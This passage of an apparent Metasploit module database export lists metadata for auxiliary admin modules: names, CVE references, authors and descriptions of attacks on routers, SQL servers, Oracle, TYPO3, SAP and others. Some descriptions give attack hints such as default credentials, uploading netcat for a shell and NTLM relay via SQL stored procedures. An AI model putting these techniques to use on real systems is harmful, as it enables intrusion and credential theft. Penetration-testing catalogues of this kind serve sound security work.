00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/jboss_seam_exec.rb","auxiliary","admin/http/jboss_seam_exec","auxiliary/admin/http/jboss_seam_exec","JBoss Seam 2 Remote Command Execution",300,"JBoss Seam 2 (jboss-seam2), as used in JBoss Enterprise Application Platform 4.3.0 for Red Hat Linux, does not properly sanitize inputs for JBoss Expression Language (EL) expressions, which allows remote attackers to execute arbitrary code via a crafted URL. NOTE: this is only a vulnerability when the Java Security Manager is not properly configured.","Metasploit Framework License (BSD)","f","2010-07-19 00:00:00",,,"aggressive","t","CVE-2010-1871, OSVDB-66881","guerrino di massa" 1135,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb","auxiliary","admin/http/linksys_e1500_e2500_exec","auxiliary/admin/http/linksys_e1500_e2500_exec","Linksys E1500/E2500 Remote Command Execution",300,"Some Linksys Routers are vulnerable to an authenticated OS command injection. Default credentials for the web interface are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command. A ping command against a controlled system for can be used for testing purposes.","Metasploit Framework License (BSD)","f","2013-02-05 00:00:00",,,"aggressive","t","BID-57760, EDB-24475, OSVDB-89912, URL-http://homesupport.cisco.com/de-eu/support/routers/E1500, URL-http://www.s3cur1ty.de/m1adv2013-004","Michael Messner " 1136,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb","auxiliary","admin/http/linksys_wrt54gl_exec","auxiliary/admin/http/linksys_wrt54gl_exec","Linksys WRT54GL Remote Command Execution",300,"Some Linksys Routers are vulnerable to OS Command injection. You will need credentials to the web interface to access the vulnerable part of the application. 
Default credentials are always a good starting point. admin/admin or admin and blank password could be a first try. Note: This is a blind OS command injection vulnerability. This means that you will not see any output of your command. Try a ping command to your local system and observe the packets with tcpdump (or equivalent) for a first test. Hint: To get a remote shell you could upload a netcat binary and exec it. WARNING: this module will overwrite network and DHCP configuration.","Metasploit Framework License (BSD)","f","2013-01-18 00:00:00",,,"aggressive","t","BID-57459, EDB-24202, OSVDB-89421, URL-http://homesupport.cisco.com/en-eu/support/routers/WRT54GL, URL-http://www.s3cur1ty.de/attacking-linksys-wrt54gl, URL-http://www.s3cur1ty.de/m1adv2013-01","Michael Messner " 1137,"2013-05-16 16:06:27","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/mutiny_frontend_read_delete.rb","auxiliary","admin/http/mutiny_frontend_read_delete","auxiliary/admin/http/mutiny_frontend_read_delete","Mutiny 5 Arbitrary File Read and Delete",300,"This module exploits the EditDocument servlet from the frontend on the Mutiny 5 appliance. The EditDocument servlet provides file operations, such as copy and delete, which are affected by a directory traversal vulnerability. Because of this, any authenticated frontend user can read and delete arbitrary files from the system with root privileges. In order to exploit the vulnerability a valid user (any role) in the web frontend is required. 
The module has been tested successfully on the Mutiny 5.0-1.07 appliance.","Metasploit Framework License (BSD)","f","2013-05-15 00:00:00",,"Read","aggressive","t","CVE-2013-0136, URL-https://community.rapid7.com/community/metasploit/blog/2013/05/15/new-1day-exploits-mutiny-vulnerabilities, US-CERT-VU-701572","juan vazquez " 1138,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/novell_file_reporter_filedelete.rb","auxiliary","admin/http/novell_file_reporter_filedelete","auxiliary/admin/http/novell_file_reporter_filedelete","Novell File Reporter Agent Arbitrary File Delete",300,"NFRAgent.exe in Novell File Reporter allows remote attackers to delete arbitrary files via a full pathname in an SRS request with OPERATION set to 4 and CMD set to 5 against /FSF/CMD. This module has been tested successfully on NFR Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1) on Windows platforms.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2011-2750, OSVDB-73729, URL-http://aluigi.org/adv/nfr_2-adv.txt","Luigi Auriemma, juan vazquez " 1139,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/rails_devise_pass_reset.rb","auxiliary","admin/http/rails_devise_pass_reset","auxiliary/admin/http/rails_devise_pass_reset","Ruby on Rails Devise Authentication Password Reset",300,"The Devise authentication gem for Ruby on Rails is vulnerable to a password reset exploit leveraging type confusion. By submitting XML to rails, we can influence the type used for the reset_password_token parameter. This allows for resetting passwords of arbitrary accounts, knowing only the associated email address. This module defaults to the most common devise URIs and response values, but these may require adjustment for implementations which customize them. Affects Devise < v2.2.3, 2.1.3, 2.0.5 and 1.5.4 when backed by any database except PostgreSQL or SQLite3. 
Tested with v2.2.2, 2.1.2, and 2.0.4 on Rails 3.2.11. Patch applied to Rails 3.2.12 and 3.1.11 should prevent exploitation of this vulnerability, by quoting numeric values when comparing them with non numeric values.","Metasploit Framework License (BSD)","f","2013-01-28 00:00:00",,,"aggressive","t","BID-57577, CVE-2013-0233, OSVDB-89642, URL-http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/, URL-http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html, URL-https://github.com/rails/rails/commit/26e13c3ca71cbc7859cc4c51e64f3981865985d8, URL-https://github.com/rails/rails/commit/921a296a3390192a71abeec6d9a035cc6d1865c8","jjarmoc, joernchen" 1140,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/scrutinizer_add_user.rb","auxiliary","admin/http/scrutinizer_add_user","auxiliary/admin/http/scrutinizer_add_user","Plixer Scrutinizer NetFlow and sFlow Analyzer HTTP Authentication Bypass",300,"This will add an administrative account to Scrutinizer NetFlow and sFlow Analyzer without any authentication. 
Versions such as 9.0.1 or older are affected.","Metasploit Framework License (BSD)","f","2012-07-27 00:00:00",,,"aggressive","t","CVE-2012-2626, OSVDB-84318, URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt","Jonathan Claudius, MC , Tanya Secker, sinn3r " 1141,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/tomcat_administration.rb","auxiliary","admin/http/tomcat_administration","auxiliary/admin/http/tomcat_administration","Tomcat Administration Tool Default Access",300,"Detect the Tomcat administration interface.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://tomcat.apache.org/","Matteo Cantoni " 1142,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb","auxiliary","admin/http/tomcat_utf8_traversal","auxiliary/admin/http/tomcat_utf8_traversal","Tomcat UTF-8 Directory Traversal Vulnerability",300,"This module tests whether a directory traversal vulnerablity is present in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0 - 6.0.16 under specific and non-default installations. The connector must have allowLinking set to true and URIEncoding set to UTF-8. Furthermore, the vulnerability actually occurs within Java and not Tomcat; the server must use Java versions prior to Sun 1.4.2_19, 1.5.0_17, 6u11 - or prior IBM Java 5.0 SR9, 1.4.2 SR13, SE 6 SR4 releases. This module has only been tested against RedHat 9 running Tomcat 6.0.16 and Sun JRE 1.5.0-05. 
You may wish to change FILE (hosts,sensitive files), MAXDIRS and RPORT depending on your environment.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2008-2938, OSVDB-47464, URL-http://tomcat.apache.org/, URL-http://www.securityfocus.com/archive/1/499926","guerrino di massa, patrick " 1143,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb","auxiliary","admin/http/trendmicro_dlp_traversal","auxiliary/admin/http/trendmicro_dlp_traversal","TrendMicro Data Loss Prevention 5.5 Directory Traversal",300,"This module tests whether a directory traversal vulnerablity is present in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294. The vulnerability appears to be actually caused by the Tomcat UTF-8 bug which is implemented in module tomcat_utf8_traversal CVE 2008-2938. This module simply tests for the same bug with Trend Micro specific settings. Note that in the Trend Micro appliance, /etc/shadow is not used and therefore password hashes are stored and anonymously accessible in the passwd file.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-48225, CVE-2008-2938, EDB-17388, OSVDB-47464, OSVDB-73447, URL-http://tomcat.apache.org/, URL-http://www.securityfocus.com/archive/1/499926","patrick " 1144,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/typo3_sa_2009_001.rb","auxiliary","admin/http/typo3_sa_2009_001","auxiliary/admin/http/typo3_sa_2009_001","TYPO3 sa-2009-001 Weak Encryption Key File Disclosure",300,"This module exploits a flaw in TYPO3 encryption ey creation process to allow for file disclosure in the jumpUrl mechanism. 
This flaw can be used to read any file that the web server user account has access to view.","Metasploit Framework License (BSD)","f","2009-01-20 00:00:00",,,"aggressive","t","OSVDB-51536, URL-http://blog.c22.cc/advisories/typo3-sa-2009-001, URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-001/","Chris John Riley" 1145,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/typo3_sa_2009_002.rb","auxiliary","admin/http/typo3_sa_2009_002","auxiliary/admin/http/typo3_sa_2009_002","Typo3 sa-2009-002 File Disclosure",300,"This module exploits a file disclosure vulnerability in the jumpUrl mechanism of Typo3. This flaw can be used to read any file that the web server user account has access to.","Metasploit Framework License (BSD)","f","2009-02-10 00:00:00",,"Download","aggressive","t","CVE-2009-0815, EDB-8038, OSVDB-52048, URL-http://secunia.com/advisories/33829/, URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/","spinbad " 1146,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/typo3_sa_2010_020.rb","auxiliary","admin/http/typo3_sa_2010_020","auxiliary/admin/http/typo3_sa_2010_020","TYPO3 sa-2010-020 Remote File Disclosure",300,"This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes. Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0. 
This flaw can be used to read any file that the web server user account has access to view.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://gregorkopf.de/slides_berlinsides_2010.pdf, URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020","Chris John Riley, Gregor Kopf" 1147,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb","auxiliary","admin/http/typo3_winstaller_default_enc_keys","auxiliary/admin/http/typo3_winstaller_default_enc_keys","TYPO3 Winstaller default Encryption Keys",300,"This module exploits known default encryption keys found in the TYPO3 Winstaller. This flaw allows for file disclosure in the jumpUrl mechanism. This issue can be used to read any file that the web server user account has access to view. The method used to create the juhash (short MD5 hash) was altered in later versions of Typo3. Use the show actions command to display and select the version of TYPO3 in use (defaults to the older method of juhash creation).","Metasploit Framework License (BSD)","f",,,"Short_MD5","aggressive","t","URL-http://typo3winstaller.sourceforge.net/","Chris John Riley" 1148,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb","auxiliary","admin/maxdb/maxdb_cons_exec","auxiliary/admin/maxdb/maxdb_cons_exec","SAP MaxDB cons.exe Remote Command Injection",300,"SAP MaxDB is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input.","Metasploit Framework License (BSD)","f","2008-01-09 00:00:00",,,"aggressive","t","BID-27206, CVE-2008-0244, OSVDB-40210","MC " 1149,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/misc/wol.rb","auxiliary","admin/misc/wol","auxiliary/admin/misc/wol","UDP Wake-On-Lan (WOL)",300,"This module will turn on a remote machine with a network card that supports wake-on-lan (or MagicPacket). 
In order to use this, you must know the machine's MAC address in advance. The current default MAC address is just an example of how your input should look like. The password field is optional. If present, it should be in this hex format: 001122334455, which is translated to ""0x001122334455"" in binary. Note that this should be either 4 or 6 bytes long.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"sinn3r " 1150,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/motorola/wr850g_cred.rb","auxiliary","admin/motorola/wr850g_cred","auxiliary/admin/motorola/wr850g_cred","Motorola WR850G v4.03 Credentials",300,"Login credentials to the Motorola WR850G router with firmware v4.03 can be obtained via a simple GET request if issued while the administrator is logged in. A lot more information is available through this request, but you can get it all and more after logging in.","Metasploit Framework License (BSD)","f","2004-09-24 00:00:00",,,"aggressive","t","CVE-2004-1550, OSVDB-10232, URL-http://seclists.org/bugtraq/2004/Sep/0339.html","kris katterjohn " 1151,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/ms/ms08_059_his2006.rb","auxiliary","admin/ms/ms08_059_his2006","auxiliary/admin/ms/ms08_059_his2006","Microsoft Host Integration Server 2006 Command Execution Vulnerability",300,"This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006.","Metasploit Framework License (BSD)","f","2008-10-14 00:00:00",,,"aggressive","t","CVE-2008-3466, MSB-MS08-059, OSVDB-49068, URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=745","MC " 1152,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mssql/mssql_enum.rb","auxiliary","admin/mssql/mssql_enum","auxiliary/admin/mssql/mssql_enum","Microsoft SQL Server Configuration Enumerator",300,"This module will perform a series of configuration audits and security checks against a 
Microsoft SQL Server database. For this module to work, valid administrative user credentials must be supplied.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Carlos Perez " 1153,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mssql/mssql_exec.rb","auxiliary","admin/mssql/mssql_exec","auxiliary/admin/mssql/mssql_exec","Microsoft SQL Server xp_cmdshell Command Execution",300,"This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell procedure. A valid username and password is required to use this module","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx","tebo " 1154,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mssql/mssql_findandsampledata.rb","auxiliary","admin/mssql/mssql_findandsampledata","auxiliary/admin/mssql/mssql_findandsampledata","Microsoft SQL Server - Find and Sample Data",300,"This script will search through all of the non-default databases on the SQL Server for columns that match the keywords defined in the TSQL KEYWORDS option. If column names are found that match the defined keywords and data is present in the associated tables, the script will select a sample of the records from each of the affected tables. The sample size is determined by the SAMPLE_SIZE option, and results output in a CSV format.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.netspi.com/blog/author/ssutherland/","Carlos Perez , Robin Wood , Scott Sutherland , hdm , humble-desser , todb " 1155,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mssql/mssql_idf.rb","auxiliary","admin/mssql/mssql_idf","auxiliary/admin/mssql/mssql_idf","Microsoft SQL Server - Interesting Data Finder",300,"This module will search the specified MSSQL server for 'interesting' columns and data. 
The module has been tested against SQL Server 2005 but it should also work on SQL Server 2008. The module will not work against SQL Server 2000 at this time, if you are interested in supporting this platform, please contact the author.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://www.digininja.org/metasploit/mssql_idf.php","Robin Wood " 1156,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mssql/mssql_ntlm_stealer.rb","auxiliary","admin/mssql/mssql_ntlm_stealer","auxiliary/admin/mssql/mssql_ntlm_stealer","Microsoft SQL Server NTLM Stealer",300,"This module can be used to help capture or relay the LM/NTLM credentials of the account running the remote SQL Server service. The module will use the supplied credentials to connect to the target SQL Server instance and execute the native ""xp_dirtree"" or ""xp_fileexist"" stored procedure. The stored procedures will then force the service account to authenticate to the system defined in the SMBProxy option. In order for the attack to be successful, the SMB capture or relay module must be running on the system defined as the SMBProxy. The database account used to connect to the database should only require the ""PUBLIC"" role to execute. Successful execution of this attack usually results in local administrative access to the Windows system. Specifically, this works great for relaying credentials between two SQL Servers using a shared service account to get shells. However, if the relay fails, then the LM hash can be reversed using the Halflm rainbow tables and john the ripper. 
Thanks to ""Sh2kerr"" who wrote the ora_ntlm_stealer for the inspiration.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://en.wikipedia.org/wiki/SMBRelay","nullbind " 1157,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mssql/mssql_ntlm_stealer_sqli.rb","auxiliary","admin/mssql/mssql_ntlm_stealer_sqli","auxiliary/admin/mssql/mssql_ntlm_stealer_sqli","Microsoft SQL Server NTLM Stealer - SQLi",300,"This module can be used to help capture or relay the LM/NTLM credentials of the account running the remote SQL Server service. The module will use the SQL injection from GET_PATH to connect to the target SQL Server instance and execute the native ""xp_dirtree"" or stored procedure. The stored procedures will then force the service account to authenticate to the system defined in the SMBProxy option. In order for the attack to be successful, the SMB capture or relay module must be running on the system defined as the SMBProxy. The database account used to connect to the database should only require the ""PUBLIC"" role to execute. Successful execution of this attack usually results in local administrative access to the Windows system. Specifically, this works great for relaying credentials between two SQL Servers using a shared service account to get shells. 
However, if the relay fails, then the LM hash can be reversed using the Halflm rainbow tables and john the ripper.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://en.wikipedia.org/wiki/SMBRelay","Antti , nullbind " 1158,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mssql/mssql_sql.rb","auxiliary","admin/mssql/mssql_sql","auxiliary/admin/mssql/mssql_sql","Microsoft SQL Server Generic Query",300,"This module will allow for simple SQL statements to be executed against a MSSQL/MSDE instance given the appropiate credentials.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx, URL-http://www.attackresearch.com","tebo " 1159,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mssql/mssql_sql_file.rb","auxiliary","admin/mssql/mssql_sql_file","auxiliary/admin/mssql/mssql_sql_file","Microsoft SQL Server Generic Query from File",300,"This module will allow for multiple SQL queries contained within a specified file to be executed against a Microsoft SQL (MSSQL) Server instance, given the appropiate credentials.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"j0hn__f : " 1160,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mysql/mysql_enum.rb","auxiliary","admin/mysql/mysql_enum","auxiliary/admin/mysql/mysql_enum","MySQL Enumeration Module",300,"This module allows for simple enumeration of MySQL Database Server provided proper credentials to connect remotely.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-https://cisecurity.org/benchmarks.html","Carlos Perez " 1161,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/mysql/mysql_sql.rb","auxiliary","admin/mysql/mysql_sql","auxiliary/admin/mysql/mysql_sql","MySQL SQL Generic Query",300,"This module allows for simple SQL statements to be executed against a MySQL instance given the 
appropriate credentials.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Bernardo Damele A. G. " 1162,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/natpmp/natpmp_map.rb","auxiliary","admin/natpmp/natpmp_map","auxiliary/admin/natpmp/natpmp_map","NAT-PMP Port Mapper",300,"Map (forward) TCP and UDP ports on NAT devices using NAT-PMP","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Jon Hart " 1163,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/officescan/tmlisten_traversal.rb","auxiliary","admin/officescan/tmlisten_traversal","auxiliary/admin/officescan/tmlisten_traversal","TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access",300,"This module tests for directory traversal vulnerability in the UpdateAgent function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM via dot dot sequences in an HTTP request.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-31531, CVE-2008-2439, OSVDB-48730, URL-http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt","Anshul Pandey , patrick " 1164,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb","auxiliary","admin/oracle/ora_ntlm_stealer","auxiliary/admin/oracle/ora_ntlm_stealer","Oracle SMB Relay Code Execution",300,"This module will help you to get Administrator access to OS using an unprivileged Oracle database user (you need only CONNECT and RESOURCE privileges). To do this you must firstly run smb_sniffer or smb_relay module on your sever. Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb which will connect to your SMB sever with credentials of Oracle RDBMS. So if smb_relay is working, you will get Administrator access to server which runs Oracle. 
If not than you can decrypt HALFLM hash.","Metasploit Framework License (BSD)","f","2009-04-07 00:00:00",,,"aggressive","t","URL-http://dsecrg.com/pages/pub/show.php?id=17","Sh2kerr " 1165,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/oracle_login.rb","auxiliary","admin/oracle/oracle_login","auxiliary/admin/oracle/oracle_login","Oracle Account Discovery",300,"This module uses a list of well known default authentication credentials to discover easily guessed accounts.","Metasploit Framework License (BSD)","f","2008-11-20 00:00:00",,,"aggressive","t","URL-http://seclists.org/fulldisclosure/2009/Oct/261, URL-http://www.petefinnigan.com/default/oracle_default_passwords.csv","MC " 1166,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/oracle_sql.rb","auxiliary","admin/oracle/oracle_sql","auxiliary/admin/oracle/oracle_sql","Oracle SQL Generic Query",300,"This module allows for simple SQL statements to be executed against a Oracle instance given the appropriate credentials and sid.","Metasploit Framework License (BSD)","f","2007-12-07 00:00:00",,,"aggressive","t","URL-https://www.metasploit.com/users/mc","MC " 1167,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/oraenum.rb","auxiliary","admin/oracle/oraenum","auxiliary/admin/oracle/oraenum","Oracle Database Enumeration",300,"This module provides a simple way to scan an Oracle database server for configuration parameters that may be useful during a penetration test. 
Valid database credentials must be provided for this module to run.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Carlos Perez " 1168,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/osb_execqr.rb","auxiliary","admin/oracle/osb_execqr","auxiliary/admin/oracle/osb_execqr","Oracle Secure Backup exec_qr() Command Injection Vulnerability",300,"This module exploits a command injection vulnerablility in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2.","Metasploit Framework License (BSD)","f","2009-01-14 00:00:00",,,"aggressive","t","CVE-2008-5448, OSVDB-51342, URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-003","MC " 1169,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/osb_execqr2.rb","auxiliary","admin/oracle/osb_execqr2","auxiliary/admin/oracle/osb_execqr2","Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability",300,"This module exploits an authentication bypass vulnerability in login.php in order to execute arbitrary code via a command injection vulnerability in property_box.php. This module was tested against Oracle Secure Backup version 10.3.0.1.0 (Win32).","Metasploit Framework License (BSD)","f","2009-08-18 00:00:00",,,"aggressive","t","CVE-2009-1977, CVE-2009-1978, OSVDB-55903, OSVDB-55904, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-058, URL-http://www.zerodayinitiative.com/advisories/ZDI-09-059","MC " 1170,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/osb_execqr3.rb","auxiliary","admin/oracle/osb_execqr3","auxiliary/admin/oracle/osb_execqr3","Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability",300,"This module exploits an authentication bypass vulnerability in login.php in order to execute arbitrary code via a command injection vulnerability in property_box.php. 
This module was tested against Oracle Secure Backup version 10.3.0.1.0 (Win32).","Metasploit Framework License (BSD)","f","2010-07-13 00:00:00",,,"aggressive","t","CVE-2010-0904, OSVDB-66338, URL-http://www.zerodayinitiative.com/advisories/ZDI-10-118","MC " 1171,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb","auxiliary","admin/oracle/post_exploitation/win32exec","auxiliary/admin/oracle/post_exploitation/win32exec","Oracle Java execCommand (Win32)",300,"This module will create a java class which enables the execution of OS commands.","Metasploit Framework License (BSD)","f","2007-12-07 00:00:00",,,"aggressive","t","URL-https://www.metasploit.com/users/mc","MC " 1172,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb","auxiliary","admin/oracle/post_exploitation/win32upload","auxiliary/admin/oracle/post_exploitation/win32upload","Oracle URL Download",300,"This module will create a java class which enables the download of a binary from a webserver to the oracle filesystem.","Metasploit Framework License (BSD)","f","2005-02-10 00:00:00",,,"aggressive","t","URL-http://www.argeniss.com/research/oraclesqlinj.zip","CG " 1173,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/sid_brute.rb","auxiliary","admin/oracle/sid_brute","auxiliary/admin/oracle/sid_brute","Oracle TNS Listener SID Brute Forcer",300,"This module simply attempts to discover the protected SID.","Metasploit Framework License (BSD)","f","2009-01-07 00:00:00",,,"aggressive","t","URL-http://www.red-database-security.com/scripts/sid.txt, URL-https://www.metasploit.com/users/mc","MC " 1174,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/oracle/tnscmd.rb","auxiliary","admin/oracle/tnscmd","auxiliary/admin/oracle/tnscmd","Oracle TNS Listener Command Issuer",300,"This module allows for the sending of arbitrary TNS commands 
in order to gather information. Inspired by tnscmd.pl from www.jammed.com/~jwa/hacks/security/tnscmd/tnscmd","Metasploit Framework License (BSD)","f","2009-02-01 00:00:00",,,"aggressive","t",,"MC " 1175,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/pop2/uw_fileretrieval.rb","auxiliary","admin/pop2/uw_fileretrieval","auxiliary/admin/pop2/uw_fileretrieval","UoW pop2d Remote File Retrieval Vulnerability",300,"This module exploits a vulnerability in the FOLD command of the University of Washington ipop2d service. By specifying an arbitrary folder name, it is possible to retrieve any file which is world- or group-readable by the user ID of the POP account. This vulnerability can only be exploited with a valid username and password. The From address is the file owner.","Metasploit Framework License (BSD)","f","2000-07-14 00:00:00",,,"aggressive","t","BID-1484, OSVDB-368","patrick " 1176,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/postgres/postgres_readfile.rb","auxiliary","admin/postgres/postgres_readfile","auxiliary/admin/postgres/postgres_readfile","PostgreSQL Server Generic Query",300,"This module imports a file local to the PostgreSQL Server into a temporary table, reads it, and then drops the temporary table. 
It requires PostgreSQL credentials with table CREATE privileges as well as read privileges to the target file.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://michaeldaw.org/sql-injection-cheat-sheet#postgres","todb " 1177,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/postgres/postgres_sql.rb","auxiliary","admin/postgres/postgres_sql","auxiliary/admin/postgres/postgres_sql","PostgreSQL Server Generic Query",300,"This module will allow for simple SQL statements to be executed against a PostgreSQL instance given the appropriate credentials.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-www.postgresql.org","todb " 1178,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/sap/sap_configservlet_exec_noauth.rb","auxiliary","admin/sap/sap_configservlet_exec_noauth","auxiliary/admin/sap/sap_configservlet_exec_noauth","SAP ConfigServlet OS Command Execution",300,"This module allows execution of operating system commands through the SAP ConfigServlet without any authentication.","Metasploit Framework License (BSD)","f","2012-11-01 00:00:00",,,"aggressive","t","EDB-24963, OSVDB-92704, URL-http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf","Andras Kabai, Dmitry Chastuhin" 1179,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb","auxiliary","admin/sap/sap_mgmt_con_osexec","auxiliary/admin/sap/sap_mgmt_con_osexec","SAP Management Console OSExecute",300,"This module allows execution of operating system commands through the SAP Management Console SOAP Interface. 
